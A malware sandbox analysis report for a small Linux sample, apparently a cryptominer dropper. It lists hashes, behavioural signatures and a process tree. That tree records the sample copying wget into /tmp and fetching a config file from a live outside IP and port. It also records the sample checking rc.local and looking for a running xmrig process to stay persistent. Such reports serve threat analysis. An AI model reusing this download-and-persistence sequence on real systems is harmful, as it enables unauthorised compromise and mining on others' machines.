Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

7

Static

static

1

ea79e6f3a9...kes118

ubuntu-18.04-amd64

7

ea79e6f3a9...kes118

debian-9-armhf

7

ea79e6f3a9...kes118

debian-9-mips

7

ea79e6f3a9...kes118

debian-9-mipsel

7

Analysis

  • max time kernel
    133s
  • max time network
    150s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20240226-en
  • resource tags

    arch:mipsimage:debian9-mipsbe-20240226-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
  • submitted
    09/04/2024, 17:01

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ea79e6f3a96671aa051f677679c2bda0_JaffaCakes118

  • Size

    2KB

  • MD5

    ea79e6f3a96671aa051f677679c2bda0

  • SHA1

    2e2f085e81e8e750da43d8217541404ab78461e9

  • SHA256

    f60d0a378a482bde674b1e5d610bd8d3926468f59ced75e4d29776d14fa4c543

  • SHA512

    ce1a0f0c3c233a3bfa2724961e9f0f4ae2b061a60560ec37f0acfabad931c6a5a13ae2477d363e855f586fb5e097d5a33c464e57fb8ab06641ac67afcff58fce

Score
7/10
persistence

Malware Config

Signatures

  • Executes dropped EXE 1 IoCs
  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Modifies rc script 1 TTPs 1 IoCs

    Adding/modifying system rc scripts is a common persistence mechanism.

    persistence
  • Reads CPU attributes 1 TTPs 1 IoCs
  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 1 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/ea79e6f3a96671aa051f677679c2bda0_JaffaCakes118
    /tmp/ea79e6f3a96671aa051f677679c2bda0_JaffaCakes118
    1⤵
    • Modifies rc script
    PID:708
    • /bin/cp
      cp /usr/bin/wget .
      2⤵
      • Writes file to tmp directory
      PID:728
    • /bin/chmod
      chmod +x wget
      2⤵
        PID:731
      • /tmp/wget
        ./wget -P /tmp/ http://103.45.185.68:6358/config.json
        2⤵
        • Executes dropped EXE
        PID:732
    • /bin/cat
      cat /etc/rc.local
      1⤵
        PID:714
      • /bin/grep
        grep /etc/mlwk.sh
        1⤵
          PID:715
        • /bin/grep
          grep -v grep
          1⤵
            PID:716
          • /bin/grep
            grep /tmp/xmrig
            1⤵
              PID:721
            • /bin/ps
              ps aux
              1⤵
              • Reads CPU attributes
              • Reads runtime system information
              PID:720
            • /bin/grep
              grep -v grep
              1⤵
                PID:722
              • /usr/bin/wc
                wc -l
                1⤵
                  PID:723

                Network

                MITRE ATT&CK Enterprise v15

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • /etc/rc.local
                  Filesize

                  18B

                  MD5

                  2e5bcdd3b23224ecae22093a9349b20a

                  SHA1

                  b4a63c6da233638e105eb63db7c2bf6dcf9b11c3

                  SHA256

                  4157be04ebab2c4aa0df84f890df6062723225e8dc19cabc475f4febc5c8a77d

                  SHA512

                  c40cd9dad61486ab872ed7d05bbdfd7ac55d22c8b12e113aa84b9ee664d5744c40807d9b7bd7390e4c570874418bdcc14695017fbffb5dabeaf58dd60ce66af7

                  Download Submit

                • /tmp/wget
                  Filesize

                  536KB

                  MD5

                  7bb64131b781b7fe42df16e951677c42

                  SHA1

                  b975e340d8aa1fade395322a2ce1d84ec8e8fdc3

                  SHA256

                  fc6db07a0e096020bb4023351df4819d74992e0148c939582ef3f83e73e56b58

                  SHA512

                  544f0b7ff535ff129be1b51e545a4e991b928d7388f9024f9c33582951980f62171f06cb7f89f03ab080d0f60a3530365ca9b98ff1ad56b984ccf58cfb59aee0

                  Download Submit